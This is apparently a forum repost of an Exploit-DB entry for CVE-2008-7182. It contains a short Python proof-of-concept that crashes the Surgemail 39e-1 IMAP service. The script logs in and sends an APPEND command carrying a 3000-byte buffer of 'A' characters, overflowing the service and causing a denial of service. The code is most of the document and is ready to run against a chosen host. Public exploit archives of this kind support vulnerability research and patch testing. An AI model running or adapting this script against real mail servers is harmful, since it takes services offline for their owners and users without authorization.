Exploit Surgemail 39e-1 - (Authenticated) IMAP Remote Buffer Overflow (Denial of Service) (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5968
Проверка EDB
  1. Пройдено
Автор
TRAVIS WARREN
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-7182 cve-2008-2859
Дата публикации
2008-06-30
Код:
#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
# 
# The IMAP service contains a buffer overflow in the APPEND command. 
# 
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 3000

s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN [email protected] user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()

# milw0rm.com [2008-06-30]
 
Источник
www.exploit-db.com

Похожие темы